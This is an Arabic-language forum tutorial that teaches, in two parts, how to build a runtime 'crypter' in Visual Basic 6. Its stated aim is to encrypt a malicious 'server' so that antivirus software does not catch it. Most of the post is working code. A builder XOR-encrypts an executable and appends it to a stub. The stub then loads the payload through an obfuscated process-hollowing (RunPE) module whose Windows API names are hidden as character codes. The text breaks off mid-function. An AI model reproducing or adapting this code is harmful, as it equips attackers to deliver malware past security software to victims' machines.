برمجـة برنامج تشفير RuNTimE بأستعمال VB6 والتشفير دائماً CLEAN ∫∫::.
صفحة 1 من اصل 1
برمجـة برنامج تشفير RuNTimE بأستعمال VB6 والتشفير دائماً CLEAN ∫∫::.
دئماً نبحث عن [ الجديد ] وسوف نقدم لكم [ الجديد ] ..
طبعاً هذه هديـة مني تقبلوها بصدر رحب ~
من فريق عمل Dev-PoiNT .. فـ لهم الشكر الجزيل ..
وأنت أيضا أيه المبدعون والأصدقاء .. كم لكم من الفكر التي أحاول أن أنتجها بشكل جديد !
طبعاً درسنا هو [ برمجـة برنامج تشفير RuNTiMe بأستعمال VB6 ] ~
RuNTimE هو تشفير أصل السيرفر وأنتاجه بنفس التشفيرة و حيث بعد التشغيل لا ينكشف أو يصطاده برنامج الحمايـة !
طبعاً نحتاج إلى Vb6 الفيجوال بيسك .. ولتحميله من هنا ..
راح ينقسم درسنا اليوم إلى قسمين :
1 - برمجـة برنامج التشفير
2- برمجـة ستب برنامج التشفير
في البدايـة
1 - برمجـة برنامج التشفير
نقوم بتشغيل الفيجوال بيسك 6 ومن ثم أتباع الأتي :
الأن نلصق هذا الكود :
كود:
Private Sub Command2_Click()
Dim Stub As String
Dim File As String
'هنا مسار الستب
Open App.Path & "\Stub.exe" For Binary As #1
Stub = Space(LOF(1))
Get #1, , Stub
Close #1
' نافذة أختيار مسار حفظ الناتج المشفر
With CommonDialog1
.DialogTitle = "حدد مكان حفظ الملف المشفر"
.Filter = "تطبيقات |*.exe"
.ShowSave
End With
' هنا بعد وضع المسار يوضع في المربع
Open Text1.Text For Binary As #1
File = Space(LOF(1))
Get #1, , File
Close #1
' خوازميـة التشفير
File = Encrypt(File, "AD8TGYSS5N66UCG8162U3G")
Open CommonDialog1.FileName For Binary As #1
Put #1, , Stub & "56XTCF8AQ2U3F11NU681J5" & File
Close #1
If chk_realign.Value = 1 Then
Call RealignPEFromFile(CommonDialog1.FileName)
End If
' رسالـة الأنتهاء من التشفير
MsgBox "تم التشفير ", vbInformation
End Sub
Private Sub Command1_Click()
' نافذة أختيار السيرفر المراد تشفيره
With CommonDialog1
.DialogTitle = "أختر الملف المراد تشفيه !"
.Filter = "تطبيقات |*.exe"
.ShowOpen
End With
' مسح المسار
If Not CommonDialog1.FileName = vbNullString Then
Text1.Text = CommonDialog1.FileName
End If
End Sub
Public Function Encrypt(sText As String, sKey As String) As String
Dim i, x, y As Integer, b() As Byte, k() As Byte
Encrypt = vbNullString
x = 0
b() = StrConv(sText, vbFromUnicode)
k() = StrConv(sKey, vbFromUnicode)
For i = 0 To Len(sText) - 1
If x = Len(sKey) - 1 Then
x = 0
Else
x = x + 1
End If
For y = 1 To 255
b(i) = b(i) Xor k(x) Mod (y + 5)
Next y
Next i
Encrypt = StrConv(b, vbUnicode)
End Function
الأن نلصق هذا الكود :
كود:
Option Explicit
Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
Private Const IMAGE_NT_OPTIONAL_HDR32_MAGIC As Long = &H10B&
Private Const SIZE_DOS_HEADER As Long = &H40
Private Const SIZE_NT_HEADERS As Long = &HF8
Private Const SIZE_SECTION_HEADER As Long = &H28
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type
Private Declare Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long)
Public Function RealignPEFromFile( _
ByVal sSrcFile As String, _
Optional sDstFile As String) As Boolean
Dim bvData() As Byte
On Local Error GoTo RealignPEFromFile_Error
If sDstFile = vbNullString Then
sDstFile = sSrcFile
End If
Open sSrcFile For Binary Access Read As #1
ReDim bvData(LOF(1) - 1)
Get #1, , bvData()
Close
If RealignPEFromBytes(bvData) Then
Open sDstFile For Binary Access Write As #1
Put #1, , bvData()
Close
End If
RealignPEFromFile = True
On Error GoTo 0
Exit Function
RealignPEFromFile_Error:
End Function
Public Function RealignPEFromBytes( _
ByRef bvData() As Byte) As Boolean
Dim lSize As Long
Dim lLastSectPos As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
Dim lDataSize As Long
Dim lAlign As Long
Dim bvExtraData() As Byte
On Local Error GoTo RealignPEFromBytes_Error
CopyMemory tIMAGE_DOS_HEADER, bvData(0), SIZE_DOS_HEADER
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
CopyMemory tIMAGE_NT_HEADERS, bvData(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
If Not tIMAGE_NT_HEADERS.OptionalHeader.Magic = IMAGE_NT_OPTIONAL_HDR32_MAGIC Then
Exit Function
End If
lLastSectPos = _
tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + _
(tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1) * SIZE_SECTION_HEADER
CopyMemory tIMAGE_SECTION_HEADER, bvData(lLastSectPos), SIZE_SECTION_HEADER
lSize = tIMAGE_SECTION_HEADER.SizeOfRawData
lDataSize = UBound(bvData) - tIMAGE_SECTION_HEADER.SizeOfRawData - tIMAGE_SECTION_HEADER.PointerToRawData + 1
If (lSize + lDataSize) Mod tIMAGE_NT_HEADERS.OptionalHeader.SectionAlignment = 0 Then
tIMAGE_SECTION_HEADER.SizeOfRawData = _
tIMAGE_SECTION_HEADER.SizeOfRawData + lSize
CopyMemory bvData(lLastSectPos), tIMAGE_SECTION_HEADER, SIZE_SECTION_HEADER
Else
ReDim bvExtraData(lDataSize - 1)
CopyMemory bvExtraData(0), bvData(UBound(bvData) - lDataSize + 1), lDataSize
ReDim Preserve bvData(UBound(bvData) - lDataSize)
lAlign = lDataSize + tIMAGE_NT_HEADERS.OptionalHeader.SectionAlignment
lAlign = lAlign - (lAlign Mod tIMAGE_NT_HEADERS.OptionalHeader.SectionAlignment)
ReDim Preserve bvData(UBound(bvData) + lAlign)
CopyMemory bvData(UBound(bvData) - lDataSize + 1), bvExtraData(0), lDataSize
tIMAGE_SECTION_HEADER.SizeOfRawData = _
tIMAGE_SECTION_HEADER.SizeOfRawData + lAlign
CopyMemory bvData(lLastSectPos), tIMAGE_SECTION_HEADER, SIZE_SECTION_HEADER
End If
RealignPEFromBytes = True
On Error GoTo 0
Exit Function
RealignPEFromBytes_Error:
End Function
وبكذا خلصنا [ برنامج التشفير ] ~
2- برمجـة ستب برنامج التشفير
الأن نقوم بفتح الفيجوال بيسك مرة أخرى :
هذا هو الكود :
كود:
Sub Main()
Dim CLAUKGG As String
Dim XCMBVEQ() As String
Dim lkjh As New Class1
sFile = App.Path & "" & App.EXEName & ".exe"
Open sFile For Binary As #1
CLAUKGG = Space(FileLen(sFile))
Get #1, , CLAUKGG
Close #1
XCMBVEQ() = Split(CLAUKGG, "56XTCF8AQ2U3F11NU681J5")
XCMBVEQ(1) = Decrypt(XCMBVEQ(1), "AD8TGYSS5N66UCG8162U3G")
lkjh.nvgx1qc0emtn1rsss3505b2vhqcepsbf75jfeu7015eplu3g9n StrConv(XCMBVEQ(1), vbFromUnicode), App.Path & "" & App.EXEName & ".exe"
End Sub
Public Function Decrypt(sText As String, sKey As String) As String
Dim i, x, y As Integer, b() As Byte, k() As Byte
Decrypt = vbNullString
x = 0
b() = StrConv(sText, vbFromUnicode)
k() = StrConv(sKey, vbFromUnicode)
For i = 0 To Len(sText) - 1
If x = Len(sKey) - 1 Then
x = 0
Else
x = x + 1
End If
For y = 1 To 255
b(i) = b(i) Xor k(x) Mod (y + 5)
Next y
Next i
Decrypt = StrConv(b, vbUnicode)
End Function
هذا هو الكود :
كود:
'---------------------------------------------------------------------------------------
' Module : cNtPEL
' DateTime : 30/06/2009 06:32
' Author : Cobein
' Mail : cobein27@hotmail.com
' ************Page : http://www.advancevb.com.ar (updated =D)
' Purpose : Inject Exe
' Usage : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
' applications, but you may not reproduce
' or publish this code on any ************ site,
' online service, or distribute as source
' on any media without express permission.
'
' Thanks to : This is gonna be a looong list xD
' Batfitch - kernel base asm
' Karcrack - For helping me to debug and test it
' Paul Caton - vTable patch examples
' rm_code - First call api prototype
' and different books and pappers
'
' Compile : P-Code !!!
'
' Comments : Coded on top of the invoke module.
'
' History : 30/06/2009 First Cut....................................................
' 02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........
'---------------------------------------------------------------------------------------
Option Explicit
Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
Private Const SIZE_DOS_HEADER As Long = &H40
Private Const SIZE_NT_HEADERS As Long = &HF8
Private Const SIZE_EXPORT_DIRECTORY As Long = &H28
Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28
Private Const THUNK_APICALL As String = "8B4C240851<UECWKCBKAA>E8<LVACRKQAXR>5989016631C0C3"
Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"
Private Const UECWKCBKAA As String = "<UECWKCBKAA>"
Private Const LVACRKQAXR As String = "<LVACRKQAXR>"
Private Const CONTEXT_FULL As Long = &H10007
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private Type CONTEXT
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_EXPORT_DIRECTORY
Characteristics As Long
TimeDateStamp As Long
MajorVersion As Integer
MinorVersion As Integer
lpName As Long
Base As Long
NumberOfFunctions As Long
NumberOfNames As Long
lpAddressOfFunctions As Long
lpAddressOfNames As Long
lpAddressOfNameOrdinals As Long
End Type
Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long
End Type
Private Declare Sub CopyBytes Lib "MSVBVM60.DLL" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any)
Private c_lKrnl As Long
Private c_lLoadLib As Long
Private c_bInit As Boolean
Private c_lVTE As Long
Private c_lOldVTE As Long
Private c_bvASM(&HFF) As Byte
Public Function avu8wctg2pljj26lpxnotpb5jp2y03kqvhtlmggeflnd0a9qvm() As Long
'This function will be replaced with machine code laterz
'Do not add any public procedure on top of it
End Function
Public Function nvgx1qc0emtn1rsss3505b2vhqcepsbf75jfeu7015eplu3g9n(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean
Dim i As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
Dim tSTARTUPINFO As STARTUPINFO
Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
Dim tCONTEXT As CONTEXT
Dim lKernel As Long
Dim lNTDll As Long
Dim lMod As Long
If Not c_bInit Then Exit Function
Call CopyBytes(SIZE_DOS_HEADER, tIMAGE_DOS_HEADER, bvBuff(0))
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CopyBytes(SIZE_NT_HEADERS, tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew))
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
'kernel32
lKernel = y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(54) & Chr$(66) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(69) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(67) & Chr$(51) & Chr$(51) & Chr$(51) & Chr$(50))) 'KPC
'ntdll
lNTDll = y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(54) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(67))) 'KPC
If sHost = vbNullString Then
sHost = Space(260)
'GetModuleFileNameW
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lKernel, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(52) & Chr$(68) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(52) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(53) & Chr$(52) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(53) & Chr$(52) & Chr$(69) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(55))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, App.hInstance, StrPtr(sHost), 260
End If
With tIMAGE_NT_HEADERS.OptionalHeader
tSTARTUPINFO.cb = Len(tSTARTUPINFO)
'CreateProcessW
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lKernel, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(51) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(48) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(51) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(51) & Chr$(55) & Chr$(51) & Chr$(53) & Chr$(55))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
'NtUnmapViewOfSection
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(69) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(49) & Chr$(55) & Chr$(48) & Chr$(53) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(55) & Chr$(52) & Chr$(70) & Chr$(54) & Chr$(54) & Chr$(53) & Chr$(51) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(51) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(57) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(69))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
'VirtualAllocEx
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lKernel, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(53) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(67) & Chr$(52) & Chr$(49) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(67) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(51) & Chr$(52) & Chr$(53) & Chr$(55) & Chr$(56))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
'NtWriteVirtualMemory
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(55) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(67) & Chr$(52) & Chr$(68) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(57))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
CopyBytes Len(tIMAGE_SECTION_HEADER), tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i)
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
Next i
tCONTEXT.ContextFlags = CONTEXT_FULL
'NtGetContextThread
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(52) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(52) & Chr$(51) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(56) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(52))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
'NtWriteVirtualMemory
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(55) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(54) & Chr$(57) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(67) & Chr$(52) & Chr$(68) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(57))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
'NtSetContextThread
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(51) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(52) & Chr$(51) & Chr$(54) & Chr$(70) & Chr$(54) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(56) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(52))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
'NtResumeThread
lMod = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lNTDll, v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(Chr$(52) & Chr$(69) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(51) & Chr$(55) & Chr$(53) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(53) & Chr$(53) & Chr$(52) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(49) & Chr$(54) & Chr$(52))) 'KPC
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 lMod, tPROCESS_INFORMATION.hThread, 0
hProc = tPROCESS_INFORMATION.hProcess
End With
nvgx1qc0emtn1rsss3505b2vhqcepsbf75jfeu7015eplu3g9n = True
End Function
Public Function a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4(ByVal lMod As Long, ParamArray Params()) As Long
Dim lPtr As Long
Dim i As Long
Dim sData As String
Dim sParams As String
If lMod = 0 Then Exit Function
For i = UBound(Params) To 0 Step -1
sParams = sParams & Chr$(54) & Chr$(56) & kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw(CLng(Params(i)))
Next
lPtr = VarPtr(c_bvASM(0))
lPtr = lPtr + (UBound(Params) + 2) * 5
lPtr = lMod - lPtr - 5
sData = THUNK_APICALL
sData = Replace(sData, UECWKCBKAA, sParams)
sData = Replace(sData, LVACRKQAXR, kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw(lPtr))
Call PutThunk(sData)
a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4 = coys1324j9dnit0ck9fqueaipj4pmgkwisso3r9hh12njqpij2
End Function
Private Function kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw(ByVal lData As Long) As String
Dim bvTemp(3) As Byte
Dim i As Long
CopyBytes &H4, bvTemp(0), lData
For i = 0 To 3
kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw = kopjntebrbsrvzzr9x0y64d72xfhujr0iv4kv83up2wq4xcayw & Right(Chr$(48) & Hex(bvTemp(i)), 2)
Next
End Function
Private Sub PutThunk(ByVal sThunk As String)
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
c_bvASM((i / 2)) = CByte(Chr$(38) & Chr$(104) & Mid$(sThunk, i + 1, 2))
Next i
End Sub
Private Function coys1324j9dnit0ck9fqueaipj4pmgkwisso3r9hh12njqpij2() As Long
CopyBytes &H4, c_lVTE, ByVal ObjPtr(Me)
c_lVTE = c_lVTE + &H1C
CopyBytes &H4, c_lOldVTE, ByVal c_lVTE
CopyBytes &H4, ByVal c_lVTE, VarPtr(c_bvASM(0))
coys1324j9dnit0ck9fqueaipj4pmgkwisso3r9hh12njqpij2 = avu8wctg2pljj26lpxnotpb5jp2y03kqvhtlmggeflnd0a9qvm
CopyBytes &H4, ByVal c_lVTE, c_lOldVTE
End Function
Public Function j8anuvmuw38t3gl7owt6273iv2lsshzi4alz2o85we3lt4y7em(ByVal sLib As String, ByVal sProc As String) As Long
